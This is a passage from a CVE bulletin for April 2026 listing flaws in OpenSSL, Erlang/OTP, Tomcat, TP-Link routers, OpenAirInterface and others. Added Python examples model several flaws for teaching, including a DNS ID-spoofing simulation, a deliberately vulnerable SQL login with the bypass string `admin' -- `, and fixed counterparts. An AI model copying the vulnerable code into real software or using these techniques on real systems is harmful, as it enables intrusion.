affected. The OpenSSL FIPS module in version 3.6 is affected by this issue.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28386 [ https://www.cve.org/CVERecord?id=CVE-2026-28386 ]
Source:
OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/61f428a2fc6671ede184a19f71e6e495f0689621 ]

OpenSSL--OpenSSL: Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0)/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs, for which RFC 7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage, are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue; the problem code is outside the FIPS module boundary.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28387 [ https://www.cve.org/CVERecord?id=CVE-2026-28387 ]
Source:
OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177 ]

OpenSSL--OpenSSL: Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed, a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28388 [ https://www.cve.org/CVERecord?id=CVE-2026-28388 ]
Source:
OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e ]

OpenSSL--OpenSSL: Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur, resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28389 [ https://www.cve.org/CVERecord?id=CVE-2026-28389 ]
Source:
OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686 ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f ]

OpenSSL--OpenSSL: Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur, resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of the RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28390 [ https://www.cve.org/CVERecord?id=CVE-2026-28390 ]
Source:
OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
3.6.2 git commit [ https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc ]
3.5.6 git commit [ https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6 ]
3.4.5 git commit [ https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788 ]
3.3.7 git commit [ https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75 ]
3.0.20 git commit [ https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4 ]

Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--Emocheck: Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted DLL file is placed in the same directory, arbitrary code may be executed with the privileges of the user invoking EmoCheck.
Published: 2026-04-10. CVSS: not yet calculated. CVE-2026-28704 [ https://www.cve.org/CVERecord?id=CVE-2026-28704 ]
Source: https://www.jpcert.or.jp/press/2026/PR20260410.html https://github.com/JPCERTCC/EmoCheck/ https://jvn.jp/en/jp/JVN00263243/

Erlang--OTP: Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias. When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect. This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19, corresponding to inets from 5.10 until 9.6.2, 9.3.2.4 and 9.1.0.6.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28808 [ https://www.cve.org/CVERecord?id=CVE-2026-28808 ]
Source: https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532-mc3f https://cna.erlef.org/cves/CVE-2026-28808.html https://osv.dev/vulnerability/EEF-CVE-2026-28808 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688 https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff7c

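The inets entry above is a classic check-vs-use mismatch: the authorisation rule is evaluated on one path and the script is executed from another. The block below is an added example, not Erlang/OTP code; it is a Python model of the mismatch in which a ScriptAlias maps `/cgi-bin/` to a directory outside DocumentRoot, a directory rule protects that directory, and the vulnerable mode evaluates the rule against the DocumentRoot-relative path. `ServerConfig` and all paths are constructed for the example; the traversal check in `_join_under` is an addition a practitioner would expect in any such resolver.

```python
"""Authorisation checked against one path, script executed from another
(CVE-2026-28808 pattern).

Added example; not Erlang/OTP code, a Python model of the mismatch the
advisory describes: a ScriptAlias maps /cgi-bin/ to a directory outside
DocumentRoot, the directory rule protects that directory, but the vulnerable
check evaluates the rule against the DocumentRoot-relative path. ServerConfig
and the paths below are constructed for the example.
"""
import posixpath
from dataclasses import dataclass


@dataclass
class ServerConfig:
    document_root: str
    script_alias: dict      # URL prefix -> filesystem directory (outside document_root)
    protected_dirs: set     # filesystem directories whose contents require authentication


def _join_under(base: str, rel: str):
    """Join and normalise; None if the result escapes `base` (.. traversal)."""
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, rel.lstrip("/")))
    if full != base and not full.startswith(base + "/"):
        return None
    return full


def is_protected(cfg: ServerConfig, fs_path: str) -> bool:
    return any(
        fs_path == d or fs_path.startswith(posixpath.normpath(d) + "/")
        for d in cfg.protected_dirs
    )


def authorize(cfg: ServerConfig, url_path: str, authenticated: bool, fixed: bool = True):
    """Return (decision, path_that_would_execute)."""
    exec_path = None
    for prefix, target in cfg.script_alias.items():
        if url_path.startswith(prefix):
            exec_path = _join_under(target, url_path[len(prefix):])   # what mod_cgi runs
            break
    else:
        exec_path = _join_under(cfg.document_root, url_path)
    if exec_path is None:
        return ("deny", None)

    if fixed:
        checked_path = exec_path                                      # rule evaluated on the real path
    else:
        # The flaw: rules evaluated on the DocumentRoot-relative path even for aliased scripts.
        checked_path = _join_under(cfg.document_root, url_path) or exec_path

    if is_protected(cfg, checked_path) and not authenticated:
        return ("deny", exec_path)
    return ("allow", exec_path)
```

The general rule the fixed branch follows: resolve the request to the object that will actually be served or executed first, then evaluate every access rule against that one resolved path.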
Erlang--OTP: Generation of Predictable Numbers or Identifiers vulnerability in Erlang/OTP kernel (inet_res, inet_db modules) allows DNS Cache Poisoning. The built-in DNS resolver (inet_res) uses a sequential, process-global 16-bit transaction ID for UDP queries and does not implement source port randomization. Response validation relies almost entirely on this ID, making DNS cache poisoning practical for an attacker who can observe one query or predict the next ID. This conflicts with RFC 5452 recommendations for mitigating forged DNS answers. inet_res is intended for use in trusted network environments and with trusted recursive resolvers. Earlier documentation did not clearly state this deployment assumption, which could lead users to deploy the resolver in environments where spoofed DNS responses are possible. This vulnerability is associated with program files lib/kernel/src/inet_db.erl and lib/kernel/src/inet_res.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19, corresponding to kernel from 3.0 until 10.6.2, 10.2.7.4 and 9.2.4.11.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-28810 [ https://www.cve.org/CVERecord?id=CVE-2026-28810 ]
Source: https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8 https://cna.erlef.org/cves/CVE-2026-28810.html https://osv.dev/vulnerability/EEF-CVE-2026-28810 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5 https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8

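The advisory above says an attacker who observes one query, or can predict the next ID, can forge the answer. The block below is an added example, not Erlang/OTP code: `SequentialResolver` models what the advisory describes (one process-global 16-bit counter and a fixed source port), `make_randomized_resolver` builds the RFC 5452 counterpart (random ID and random ephemeral port per query), and `run_attack` lets an attacker who saw one query race the next one with a budget of forged answers. Names, the spoofed address and the port range are constructed for the example; the random stream is seeded so the run is repeatable.

```python
"""Spoofing a UDP DNS answer against predictable vs. randomised transaction IDs
(CVE-2026-28810 pattern).

Added example; not Erlang/OTP code. SequentialResolver models what the advisory
describes (one process-global 16-bit counter, fixed source port); RandomizedResolver
models the RFC 5452 mitigations. The attacker sees one query on the wire and then
races the next one with forged answers. Names, addresses and the port range are
constructed for the example; the random stream is seeded so the run is repeatable.
"""
import random

SPOOFED_ADDRESS = "203.0.113.66"   # TEST-NET-3 address the attacker wants cached


class SequentialResolver:
    """Next ID = previous ID + 1, always from the same source port."""

    def __init__(self, start_id=0, source_port=53000):
        self.next_id = start_id
        self.source_port = source_port

    def query(self, name):
        qid = self.next_id & 0xFFFF
        self.next_id += 1
        return {"name": name, "id": qid, "sport": self.source_port}

    def accept(self, query, response):
        # The only checks that matter when validation rests on the ID alone.
        return response["id"] == query["id"] and response["dport"] == query["sport"]


class RandomizedResolver(SequentialResolver):
    """Random 16-bit ID and a random ephemeral source port per query (RFC 5452)."""

    def __init__(self, rng):
        super().__init__()
        self.rng = rng

    def query(self, name):
        return {"name": name, "id": self.rng.getrandbits(16),
                "sport": self.rng.randrange(1024, 65536)}


def make_randomized_resolver(seed=2026):
    return RandomizedResolver(random.Random(seed))


def predicting_attacker(observed, budget):
    """Forged answers assuming IDs increase by one and the port never changes."""
    return [
        {"id": (observed["id"] + i) & 0xFFFF, "dport": observed["sport"], "answer": SPOOFED_ADDRESS}
        for i in range(1, budget + 1)
    ]


def run_attack(resolver, attacker, victim_name, budget):
    """Attacker observes one query, then races the next with `budget` forged answers."""
    observed = resolver.query("probe.example")   # e.g. triggered by a link the attacker controls
    target = resolver.query(victim_name)          # the query whose answer is to be poisoned
    for forged in attacker(observed, budget):
        if resolver.accept(target, forged):
            return True
    return False
```

Against the sequential resolver one forged packet suffices; against the randomised one the attacker has to cover roughly 2^16 IDs times 2^16 ports blind, which is why the same 5000-packet budget fails.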
Apache Software Foundation--Apache Tomcat: Configured cipher preference order not preserved vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.16 through 11.0.18, from 10.1.51 through 10.1.52, from 9.0.114 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-29129 [ https://www.cve.org/CVERecord?id=CVE-2026-29129 ]
Source: https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f

Apache Software Foundation--Apache Tomcat: CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled vulnerability in Apache Tomcat, Apache Tomcat Native. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M7 through 10.1.52, from 9.0.83 through 9.0.115; Apache Tomcat Native: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39, from 1.3.0 through 1.3.6, from 2.0.0 through 2.0.13. Users are recommended to upgrade to version Tomcat Native 1.3.7 or 2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.116, which fix the issue.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-29145 [ https://www.cve.org/CVERecord?id=CVE-2026-29145 ]
Source: https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz

Apache Software Foundation--Apache Tomcat: Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fix the issue.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-29146 [ https://www.cve.org/CVERecord?id=CVE-2026-29146 ]
Source: https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w

n/a--n/a: PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php.
Published: 2026-04-10. CVSS: not yet calculated. CVE-2026-29861 [ https://www.cve.org/CVERecord?id=CVE-2026-29861 ]
Source: https://github.com/amanyadav78/CVE-2026-29861

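The entry above gives only the parameter and the page, so the block below shows the pattern behind it and its fix. It is an added example, not the PHP-MYSQL-User-Login-System code: an in-memory SQLite database with a constructed `users` table, a `login_vulnerable` that concatenates the username into the statement, and a `login_fixed` that binds it as a parameter. SHA-256 is used only to keep the example short; a real login system stores a slow password hash such as argon2, scrypt or bcrypt.

```python
"""Login bypass through string-built SQL, and the parameterised fix
(CVE-2026-29861 pattern).

Added example; not the PHP-MYSQL-User-Login-System code. It uses an in-memory
SQLite database and a constructed users table so it runs offline; the
vulnerable query reproduces the pattern of concatenating the username into
the statement. SHA-256 is used only to keep the example short; a real login
system stores a slow password hash (argon2, scrypt, bcrypt).
"""
import hashlib
import hmac
import sqlite3


def _digest(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", _digest("correct horse battery staple")), ("bob", _digest("hunter2"))],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Username is pasted into the SQL text: a quote in it rewrites the query."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username + "' "
        "AND password_hash = '" + _digest(password) + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Placeholders keep the input as data; the statement text never changes."""
    row = conn.execute(
        "SELECT username, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None or not hmac.compare_digest(row[1], _digest(password)):
        return None
    return row[0]
```

With the username `admin' -- ` the vulnerable statement becomes `... WHERE username = 'admin' -- ' AND password_hash = '...'`: the password clause is commented out and the admin row is returned for any password.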
Entechtaiwan[.]com--PowerStrip: The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-29923 [ https://www.cve.org/CVERecord?id=CVE-2026-29923 ]
Source: https://entechtaiwan.com/util/ps.shtm https://packetstorm.news/files/id/218394/

n/a--OpenAirInterface: OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing an UplinkNASTransport containing an Authentication Response whose NAS PDU carries an oversize response (for example, 100 bytes). The response is decoded by the AMF and passed to the AUSF component for verification. The AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Service (DoS).
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30075 [ https://www.cve.org/CVERecord?id=CVE-2026-30075 ]
Source: https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6

n/a--OpenAirInterface: OpenAirInterface V2.2.0 AMF crashes when it receives an NGAP message with an invalid procedure code or an invalid PDU type, for example when the message specification requires InitiatingMessage but the message is sent as successfulOutcome.
Published: 2026-04-06. CVSS: not yet calculated. CVE-2026-30078 [ https://www.cve.org/CVERecord?id=CVE-2026-30078 ]
Source: https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74 https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414

n/a--OpenAirInterface: In OpenAirInterface V2.2.0 AMF, out-of-sequence messages cause an incorrect state transition during the UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after the initial UE registration, a registration reject is received followed by a registration accept. This leads to the UE being registered without proper authentication.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-30079 [ https://www.cve.org/CVERecord?id=CVE-2026-30079 ]
Source: https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77

n/a--OpenAirInterface: OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. The configuration supports the integrity algorithms NIA1 and NIA2, but if a UE sends an initial registration request advertising only the null integrity capability IA0, OpenAirInterface accepts it and proceeds. This downgraded security context can lead to the possibility of replay attacks.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30080 [ https://www.cve.org/CVERecord?id=CVE-2026-30080 ]
Source: https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78

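The two AMF entries above (CVE-2026-30079 and CVE-2026-30080) are both failures of the registration state machine: a message accepted in the wrong state, and a security context negotiated down to null integrity. The block below is an added example, not OpenAirInterface code: `AmfRegistration` is a deliberately small model of the AMF side of 5G registration (RegistrationRequest, AuthenticationRequest/Response, SecurityModeCommand/Complete, RegistrationAccept) that rejects any message not allowed in its current state without changing state, never selects NIA0, and accepts SecurityModeComplete only with a valid integrity tag. The key `K`, the RES computation and the 32-bit NAS-MAC (HMAC-SHA256 truncated) are stand-ins for the real 5G-AKA and NIA algorithms so the example runs with the standard library; message dicts are constructed for the example.

```python
"""A registration state machine that refuses out-of-sequence NAS messages and
null-integrity-only UEs (CVE-2026-30079 and CVE-2026-30080 patterns).

Added example; not OpenAirInterface code. AmfRegistration is a deliberately
small model of the AMF side of 5G registration. The key K, the RES computation
and the NAS-MAC (HMAC-SHA256 truncated to 32 bits) are stand-ins for the real
5G-AKA and NIA algorithms, chosen so the example runs with the standard library.
Message dicts are constructed for the example.
"""
import hashlib
import hmac
import secrets

K = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed shared key

# AMF policy: algorithms in preference order. NIA0 (null integrity) is never selected.
SUPPORTED_INTEGRITY = ("NIA2", "NIA1")

# Which NAS message is acceptable in which state. Anything else is rejected
# without changing state, so a stray SecurityModeComplete cannot skip authentication.
ALLOWED = {
    "IDLE": {"RegistrationRequest"},
    "AUTH_PENDING": {"AuthenticationResponse"},
    "SMC_PENDING": {"SecurityModeComplete"},
    "REGISTERED": set(),
}


def ue_compute_res(k: bytes, rand: bytes) -> bytes:
    """UE side of the challenge (stand-in for 5G-AKA RES*)."""
    return hmac.new(k, b"RES" + rand, hashlib.sha256).digest()[:16]


def ue_compute_mac(k: bytes, algorithm: str, payload: bytes) -> bytes:
    """NAS integrity tag (stand-in for NIA1/NIA2); NIA0 provides no protection."""
    if algorithm == "NIA0":
        return b"\x00\x00\x00\x00"
    return hmac.new(k, algorithm.encode() + payload, hashlib.sha256).digest()[:4]


class AmfRegistration:
    def __init__(self, k: bytes):
        self.k = k
        self.state = "IDLE"
        self.rand = None
        self.selected_integrity = None
        self.log = []

    def handle(self, msg: dict) -> str:
        kind = msg["type"]
        if kind not in ALLOWED[self.state]:
            self.log.append(f"{kind} rejected in state {self.state}")
            return "REGISTRATION_REJECT"          # state unchanged
        return getattr(self, "_on_" + kind)(msg)

    def _on_RegistrationRequest(self, msg):
        usable = [a for a in SUPPORTED_INTEGRITY if a in msg["integrity_caps"]]
        if not usable:                             # UE offers only NIA0 (or nothing usable)
            self.log.append("no acceptable integrity algorithm")
            return "REGISTRATION_REJECT"
        self.selected_integrity = usable[0]
        self.rand = secrets.token_bytes(16)
        self.state = "AUTH_PENDING"
        return "AUTHENTICATION_REQUEST"

    def _on_AuthenticationResponse(self, msg):
        if not hmac.compare_digest(msg["res"], ue_compute_res(self.k, self.rand)):
            self.state = "IDLE"                    # failed authentication restarts the procedure
            return "REGISTRATION_REJECT"
        self.state = "SMC_PENDING"
        return "SECURITY_MODE_COMMAND"

    def _on_SecurityModeComplete(self, msg):
        expected = ue_compute_mac(self.k, self.selected_integrity, msg["payload"])
        if not hmac.compare_digest(msg["mac"], expected):
            self.log.append("SecurityModeComplete without valid integrity protection")
            return "REGISTRATION_REJECT"           # stay in SMC_PENDING, nothing accepted
        self.state = "REGISTERED"
        return "REGISTRATION_ACCEPT"
```

The two properties the advisories lack are visible in the tests: an unexpected message leaves `state` untouched, and a capability list containing only NIA0 never produces a security context at all.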
chartbrew--chartbrew: Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5.
Published: 2026-04-10. CVSS: not yet calculated. CVE-2026-30232 [ https://www.cve.org/CVERecord?id=CVE-2026-30232 ]
Source: https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1

n/a--Daylight Studio FuelCMS: Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module.
Published: 2026-04-07. CVSS: not yet calculated. CVE-2026-30460 [ https://www.cve.org/CVERecord?id=CVE-2026-30460 ]
Source: https://github.com/daylightstudio/FUEL-CMS/ http://daylight.com http://fuelcms.com https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf

Ms4w[.]com--GatewayGeo Mapserver: A Dynamic-link Library Injection vulnerability in GatewayGeo MapServer for Windows version 5 allows attackers to escalate privileges via a crafted executable.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-30478 [ https://www.cve.org/CVERecord?id=CVE-2026-30478 ]
Source: https://ms4w.com https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478

Ms4w[.]com--GatewayGeo Mapserver: A Dynamic-link Library Injection vulnerability in OSGeo Project MapServer before v8.0 allows attackers to execute arbitrary code via a crafted executable.
Published: 2026-04-09. CVSS: not yet calculated. CVE-2026-30479 [ https://www.cve.org/CVERecord?id=CVE-2026-30479 ]
Source: https://mapserver.org/index.html https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479

Aziot[.]life--AZIOT 1 Node Smart Switch: An information disclosure vulnerability exists in the AZIOT 1 Node Smart Switch (16 amp, WiFi/Bluetooth enabled), software version 1.1.9, due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication.
Published: 2026-04-06. CVSS: not yet calculated. CVE-2026-30613 [ https://www.cve.org/CVERecord?id=CVE-2026-30613 ]
Source: http://aziot.com https://github.com/dumbermore/tuya/blob/main/README.md

TP-Link Systems Inc.--AX53 v1.0: A stack-based buffer overflow in the tmpServer module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to trigger a segmentation fault and potentially execute arbitrary code via a specially crafted configuration file. Successful exploitation may cause a crash and could allow arbitrary code execution, enabling modification of device state, exposure of sensitive data, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30814 [ https://www.cve.org/CVERecord?id=CVE-2026-30814 ]
Source: https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/

TP-Link Systems Inc.--AX53 v1.0: An OS command injection vulnerability in the OpenVPN module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed, due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30815 [ https://www.cve.org/CVERecord?id=CVE-2026-30815 ]
Source: https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/

TP-Link Systems Inc.--AX53 v1.0: An external control of configuration vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30816 [ https://www.cve.org/CVERecord?id=CVE-2026-30816 ]
Source: https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/

TP-Link Systems Inc.--AX53 v1.0: An external configuration control vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30817 [ https://www.cve.org/CVERecord?id=CVE-2026-30817 ]
Source: https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/

